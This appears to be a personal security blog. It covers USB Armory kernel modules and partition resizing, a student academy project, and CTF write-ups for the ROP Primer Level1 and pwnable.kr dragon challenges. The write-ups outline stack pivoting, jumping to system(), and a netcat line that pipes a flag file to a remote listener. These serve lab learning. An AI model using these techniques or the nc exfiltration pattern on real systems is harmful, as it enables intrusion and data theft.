USBArmory: LKMs

Hi! I’m going to show you how you can write and load your own LKMs (loadable kernel modules) for the USBArmory.

1. download the kernel source
2. download the .config file used by InversePath
3. compile the kernel and generate all important files
4. write module & makefile
5. insert & remove the module

1.
If you want to write your own modules you’ll need the kernel headers specifically for your running kernel.
If you’re running the latest image, you just need to download the kernel source for linux-4.2.1.

2.
Now we need to download the .config file and place it into the kernel source directory.

3.
Run ‘sudo make; sudo make modules_prepare’ to create all important files.
This can take quite some time, so grab a coffee or a book.

4.
Finally we can write our own module:

And our Makefile:

You have to insert your path to the kernel source directory.
The ‘-C’ flag points to the kernel sources (which would be /home/usbarmory/linux-4.2.1/) and the ‘M’ variable to the directory of your module (which would be /home/usbarmory).
The ‘modules’ at the end is the target; it tells make what to build.

You can now enter ‘sudo make’ to build the LKM:

5.
Now you can insert your module into the kernel.

Look at the last output of ‘dmesg’ to see our module in action:

Unloading works in much the same way:

Again see the output of ‘dmesg’:

To see a list of all modules currently loaded, you can enter ‘lsmod’.
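Steps 4 and 5 as an added example (not the post's original module or Makefile): the script writes a minimal module and a kbuild Makefile using the paths mentioned above, and `vermagic_matches` checks the point from step 1, that the module was built for the running kernel. The module name `hello`, both function names and the vermagic strings are assumptions made for illustration.

```sh
#!/bin/sh
# Added example, not the post's code; "hello" and both helpers are assumed names.

# write_lkm_skeleton <module-dir> <kernel-source-dir>
write_lkm_skeleton() {
    cat > "$1/hello.c" <<'EOF'
#include <linux/init.h>
#include <linux/kernel.h>
#include <linux/module.h>

MODULE_LICENSE("GPL");

static int __init hello_init(void)
{
    pr_info("hello: module loaded\n");   /* visible in dmesg after insmod */
    return 0;
}

static void __exit hello_exit(void)
{
    pr_info("hello: module unloaded\n"); /* visible in dmesg after rmmod */
}

module_init(hello_init);
module_exit(hello_exit);
EOF
    # -C enters the kernel tree, M= points back at the module directory,
    # "modules" is the target. printf emits the tab the recipe line needs.
    printf 'obj-m += hello.o\nKDIR ?= %s\n\nall:\n\tmake -C $(KDIR) M=$(CURDIR) modules\n' \
        "$2" > "$1/Makefile"
}

# vermagic_matches <vermagic> <kernel-release>: 0 if the module was built for
# that kernel. Real values: modinfo -F vermagic hello.ko  and  uname -r
vermagic_matches() {
    case "$1" in
        "$2 "*) return 0 ;;
        *)      return 1 ;;
    esac
}

dir=$(mktemp -d)
write_lkm_skeleton "$dir" /home/usbarmory/linux-4.2.1
echo "wrote $dir/hello.c and $dir/Makefile"
# On the device: sudo make; sudo insmod hello.ko; dmesg | tail; sudo rmmod hello
# Constructed vermagic strings: the first fits kernel 4.2.1, the second does not.
vermagic_matches "4.2.1 mod_unload ARMv7 p2v8" "4.2.1" && echo "vermagic ok"
vermagic_matches "4.1.6 mod_unload ARMv7 p2v8" "4.2.1" || echo "vermagic mismatch"
```

A vermagic mismatch is the usual reason insmod rejects a module with an "Invalid module format" error, which is why the headers have to match the running kernel.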

Have fun writing your own modules!

Carl Smith

Student Academy North-Rhine-Westphalia

Hello guys!

Last week I participated in the Student Academy of North-Rhine-Westphalia for maths and computer science. My school had chosen me to apply at the academy, which then accepted me and invited me to work in groups with 99 of the best math and computer science students of my federal state.
The academy had way over 250 applications, so I am quite proud that they invited me.
There were 16 projects altogether and I chose a project that is related more towards computer science than maths. We had to implement a network-based computer game to explain networking concepts and custom-built protocols.
So in 4 days we wrote about 5200 lines of source code; you can find the game here. Please feel free to download the jar files or even the source code.
We fully developed the code with the Eclipse IDE.

The members of my group were:

Andreas Brüggemann
Alexander Kummutat
Jonas Nötzel
Julian Schmidt
Kai Schenk
Monja Raschke

It was a hell of a week! I am very happy that I was allowed to take part in this project!
With teamwork and a lot of thinking we were able to create something of which we are very proud in this short amount of time.

Carl Smith

ROP Primer Level1

Hey guys!

Here’s my try at Level1 from Bas’ ROP-Primer box.
You can download it on http://www.vulnhub.com. They also have great educational materials related to infosec.

It’s a remote service that is a simple file storage system. It has a handle_conn() function that is vulnerable to an overflow.

I’ve made a two-stage exploit that reads in input, the command we want to execute, then stack-pivots to the vulnerable function. After that we send our second stage, which executes system() with our previously sent command.
In order to build this exploit I used PEDA, a good plugin for GDB, especially for exploit development. But you could also use ropshell.com or the Python version.

So with this exploit we can easily execute any command under the owner’s privileges.

I think the directory ‘/home/level1’ on the remote machine is supposed to have the privileges ‘rwxrwx--x’, so we have to manually change it, otherwise we cannot execute anything.
I think he has fixed this issue in version 0.2 from Vulnhub.

Since the netcat version installed on the box is the OpenBSD version, we do not have the “-e” option.
Because of this, we have to pipe the flag into netcat and let it listen for any incoming connections.
Then we just connect with our machine and redirect the output into a file.

The command we execute is ‘cat flag |nc -l 9191’

Then on our own machine we execute ‘nc XX.XX.XX.XX 9191 > flag’

My exploit code does this automatically so you don’t have to change anything, except the IP of the remote machine.

I’ve thoroughly commented the code, so with some experience you should be able to understand what’s happening.
If you don’t have any experience, I would recommend this primer on return-oriented programming. Otherwise you can always read Corelan’s tutorials on his webpage.

The exploit code itself is here.

I created a page where I recommend some books which will give you a good introduction into Software Security, so you can also have a look at that if you want to.

Cheers!
Carl Smith

USB-Armory resizing partition

Here are the complete instructions on how to resize your USB-Armory’s filesystem to use the whole SD-Card.
We are going to use fdisk and resize2fs to resize the existing partition.

So first we are going to check the partitions.

So we have one partition called mmcblk0p1 that we are going to expand.
We are going to use fdisk to create a new partition in place of the old one.
First press ‘p’ to print out all the existing partitions and note the starting sector of the existing partition; in my case that would be 10240. Then delete the old partition (by pressing ‘d’).

Then create a new one by pressing ‘n’, then ‘p’ for primary. Now enter the starting sector, in my case 10240.
Now hit enter to use the full disk. Now we have created our new partition.
Press ‘p’ to verify the existence of our partition.

So after creating the partition we are going to write the changes ( enter ‘w’ ).
Then reboot the USB-Armory.

When the device has rebooted and you have successfully logged in, we are going to use resize2fs to resize the filesystem.
When we enter ‘df -h’ we can see that our new filesystem is now 30G big :-)
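The step that can destroy data is recreating the partition on a different starting sector. The following added example (not part of the original post) compares the partition table printed with ‘p’ before and after the change; the function names and the sample fdisk output are constructed, only mmcblk0p1 and the start sector 10240 come from the text above.

```sh
#!/bin/sh
# Added example: check that a delete-and-recreate resize keeps the start sector.
# The fdisk listings below are constructed sample text.

# part_field <fdisk-output> <device> <start|end>: print that sector number.
part_field() {
    printf '%s\n' "$1" | awk -v dev="$2" -v want="$3" '
        $1 == dev {
            i = ($2 == "*") ? 3 : 2      # skip the Boot flag column if it is set
            if (want == "end") i++
            print $i
        }'
}

# resize_is_safe <before> <after> <device>
# returns 0 if start is unchanged and the end did not shrink,
#         1 if the data would be shifted or truncated,
#         2 if the partition is missing from either listing.
resize_is_safe() {
    old_start=$(part_field "$1" "$3" start); new_start=$(part_field "$2" "$3" start)
    old_end=$(part_field "$1" "$3" end);     new_end=$(part_field "$2" "$3" end)
    [ -n "$old_start" ] && [ -n "$new_start" ] || return 2
    [ "$old_start" -eq "$new_start" ] || return 1
    [ "$new_end" -ge "$old_end" ] || return 1
    return 0
}

BEFORE='Device         Boot Start     End Sectors  Size Id Type
/dev/mmcblk0p1      10240 7577599 7567360  3.6G 83 Linux'
AFTER_OK='Device         Boot Start      End  Sectors  Size Id Type
/dev/mmcblk0p1      10240 62333951 62323712 29.7G 83 Linux'
AFTER_BAD='Device         Boot Start      End  Sectors  Size Id Type
/dev/mmcblk0p1       2048 62333951 62331904 29.7G 83 Linux'

if resize_is_safe "$BEFORE" "$AFTER_OK" /dev/mmcblk0p1; then
    echo "same start sector: write with w, reboot, then resize2fs /dev/mmcblk0p1"
fi
resize_is_safe "$BEFORE" "$AFTER_BAD" /dev/mmcblk0p1 || echo "start sector changed: quit fdisk with q"
```

Nothing is written to the card until ‘w’ is entered, so a failed check can be abandoned with ‘q’.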

I hope it worked for you guys!
If you have any questions feel free to ask!

Dragon write-up

I will go through all steps needed to exploit the dragon challenge on pwnable.kr.

This is a remote challenge, so first we need the provided binary for analysis.

After downloading, we check the filetype and run it a couple of times.
Also let it create a core dump if it crashes.

After some manual fuzzing we get the desired result: a crash. This looks like we got control.
So let’s open up GDB and check where we would’ve returned.
Don’t forget to load the core.
And look closely….

So upon closer examination we see that our return address consists of our last input.
AAAA = 0x41414141 (when thinking in hex)

Now we’ve got control over eip, but what can we do with it?
We can’t do ret2stack because we just control eip and nothing valuable would be there.
ROP is not possible because we can’t fake stack frames.
Writing to dtors or GOT is not an option either…

Well then let’s see if we can reuse code of the binary.
Let’s check for the symbols in the binary.

Ah, at the end we see the magic call “system()”.
So, the last thing we need is a string to “/bin/sh”.
Let’s check the binary in GDB for the call “system()”.

We see a call to a strange “SecretLevel”, so let us check that.

Wow, there is the system() call.
And just above the system() call something is moved to the stack…
I wonder what that could be….

Jackpot. This is our return address:

RET = 0x08048dbf

So now we’re going to develop our exploit code in Python…

Finally test the exploit code and launch it against pwnable.kr’s server.
Don’t forget “cat” to keep our freshly spawned shell alive.

Wohoo, so our exploit works perfectly :-)

Let’s launch it against their server and get that flag!

This will spawn the desired shell, so you’re able to view the flag :-)

I hope you liked this write-up!
A pretty simple challenge from pwnable.kr, which gives you 75 pts.
Feel free to write a comment or even contact me if you want to talk about security related stuff.

Carl Smith